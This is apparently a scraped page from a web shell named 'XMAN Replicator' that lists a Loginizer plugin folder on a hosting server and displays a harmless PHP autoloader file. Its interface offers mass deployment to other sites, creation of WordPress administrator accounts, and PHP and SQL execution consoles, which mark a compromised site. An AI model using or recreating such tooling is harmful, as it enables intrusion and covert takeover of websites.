🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
var
/
softaculous
/
sitepad
/
editor
/
site-data
/
plugins
/
loginizer-security
/
lib
/
MaxMind
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-04-25 08:06
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-04-25 08:06
🔄
🗑️
🗑️📁
⬇️
🔒
[Db]
<DIR>
drwxr-xr-x
2026-04-25 08:06
🔄
🗑️
🗑️📁
⬇️
🔒
autoloader.php
502 B
-rw-r--r--
2026-04-22 07:17
✏️
🔄
🗑️
⬇️
🔒
Edit: autoloader.php
<?php function loginizer_maxmind_autoloader($class){ $prefix = 'LoginizerMaxMind\\Db\\'; $base_dir = __DIR__ . '/Db/'; if(strncmp($class, $prefix, strlen($prefix)) !== 0){ return; } $relative = substr($class, strlen($prefix)); $relative_path = str_replace('\\', '/', $relative) . '.php'; $file = $base_dir . $relative_path; if(file_exists($file)){ include_once $file; } } spl_autoload_register('loginizer_maxmind_autoloader');
Save
PHP Console
Execute
SQL Console
Execute